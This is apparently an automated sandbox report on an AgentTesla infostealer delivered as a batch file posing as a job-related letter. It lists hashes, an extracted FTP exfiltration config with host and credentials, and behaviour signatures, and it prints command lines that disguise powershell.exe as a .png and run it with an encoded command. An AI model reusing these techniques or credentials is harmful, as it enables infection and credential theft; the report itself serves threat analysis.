Analysis
- max time kernel: 100s
- max time network: 110s
- platform: windows10-2004_x64
- resource: win10v2004-20231130-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231130-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 11-12-2023 21:35
Static task: static1
Behavioral task: behavioral1
  Sample: Abusive Letter (Resdex Database and Job Posting).bat
  Resource: win7-20231025-en
Behavioral task: behavioral2
  Sample: Abusive Letter (Resdex Database and Job Posting).bat
  Resource: win10v2004-20231130-en
General
- Target: Abusive Letter (Resdex Database and Job Posting).bat
- Size: 1006KB
- MD5: ee9ec74fbf7fb7ed42103267a77f7d83
- SHA1: 1aeae07889b0c11c8587472db3ebf4b77ff9d451
- SHA256: 559de1ddc69375c9e08b178e72fe6dcbf0e999e7b078ee94c016a152b8907937
- SHA512: eae98812d446c2963243a4313f94d6c5a1a3fb6ec2d8f8dd742d21f2bd48c1515d6566af8de144741dfb4465f3ea2467a1b3dfcc49e7c4b1d8e0c6749667421e
- SSDEEP: 24576:l/KZIPLG6VRHiTKZdtOyts5TvPISg7iCbdpH3JrgceWk:oIPKwgGDOIGjqbd5qdT
Malware Config
Extracted: agenttesla
- Protocol: ftp
- Host: ftp://files.000webhost.com
- Port: 21
- Username: tain00
- Password: computer@2020
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Executes dropped EXE (1 IoC)
  pid   Process
  3032  Qmlugnd.png
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk, where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Program crash (1 IoC)
  pid  pid_target  Process       procid_target
  684  3032        WerFault.exe  98
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid   Process
  3032  Qmlugnd.png
  3032  Qmlugnd.png
  3032  Qmlugnd.png
  3032  Qmlugnd.png
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description                pid   Process
  Token: SeDebugPrivilege    3032  Qmlugnd.png
  Token: SeDebugPrivilege    3032  Qmlugnd.png
  Token: SeRestorePrivilege  3032  Qmlugnd.png
  Token: SeBackupPrivilege   3032  Qmlugnd.png
- Suspicious use of WriteProcessMemory (17 IoCs)
  description                       pid   Process  procid_target
  PID 3136 wrote to memory of 4424  3136  cmd.exe  90
  PID 3136 wrote to memory of 4424  3136  cmd.exe  90
  PID 3136 wrote to memory of 4780  3136  cmd.exe  91
  PID 3136 wrote to memory of 4780  3136  cmd.exe  91
  PID 3136 wrote to memory of 3432  3136  cmd.exe  92
  PID 3136 wrote to memory of 3432  3136  cmd.exe  92
  PID 3432 wrote to memory of 1376  3432  cmd.exe  95
  PID 3432 wrote to memory of 1376  3432  cmd.exe  95
  PID 3432 wrote to memory of 4864  3432  cmd.exe  94
  PID 3432 wrote to memory of 4864  3432  cmd.exe  94
  PID 3432 wrote to memory of 2444  3432  cmd.exe  97
  PID 3432 wrote to memory of 2444  3432  cmd.exe  97
  PID 3432 wrote to memory of 3176  3432  cmd.exe  96
  PID 3432 wrote to memory of 3176  3432  cmd.exe  96
  PID 3432 wrote to memory of 3032  3432  cmd.exe  98
  PID 3432 wrote to memory of 3032  3432  cmd.exe  98
  PID 3432 wrote to memory of 3032  3432  cmd.exe  98
Processes
- C:\Windows\system32\cmd.exe (depth 1)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Abusive Letter (Resdex Database and Job Posting).bat"
  Signatures: Suspicious use of WriteProcessMemory
  PID: 3136
  - C:\Windows\system32\cmd.exe (depth 2)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo F "
    PID: 4424
  - C:\Windows\system32\xcopy.exe (depth 2)
    Command line: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Qmlugnd.png
    PID: 4780
  - C:\Windows\system32\cmd.exe (depth 2)
    Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Abusive Letter (Resdex Database and Job Posting).bat"
    Signatures: Suspicious use of WriteProcessMemory
    PID: 3432
    - C:\Windows\system32\xcopy.exe (depth 3)
      Command line: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Qmlugnd.png
      PID: 4864
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo F "
      PID: 1376
    - C:\Windows\system32\xcopy.exe (depth 3)
      Command line: xcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\Abusive Letter (Resdex Database and Job Posting).bat" C:\Users\Admin\AppData\Local\Temp\Qmlugnd.png.bat
      PID: 3176
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo F "
      PID: 2444
    - C:\Users\Admin\AppData\Local\Temp\Qmlugnd.png (depth 3)
      Command line: C:\Users\Admin\AppData\Local\Temp\Qmlugnd.png -win 1 -enc [base64-encoded PowerShell command argument omitted]
      Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      PID: 3032
      - C:\Windows\SysWOW64\WerFault.exe (depth 4)
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 2404
        Signatures: Program crash
        PID: 684
- C:\Windows\SysWOW64\WerFault.exe (depth 1)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3032 -ip 3032
  PID: 4804
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 423KB
  MD5: c32ca4acfcc635ec1ea6ed8a34df5fac
  SHA1: f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
  SHA256: 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
  SHA512: 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
- Filesize: 667KB
  MD5: 73e6af13c928f8518e5c2755d46ae1da
  SHA1: 3b6563ad6554c1544d80b8f323963c81179c61ff
  SHA256: 61bdfec3d05bcf842689122d4098e62c10716f7de7ea9ae5e0ec14a54899f8f7
  SHA512: 46d20936875b0c1280752e5cf1807b851fd761d6c4f312f9b27911e8821ad31a1c3fbeecf15c9280d9791bc2ff25afda4a3e2518a57697604e36afd9e3455607
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82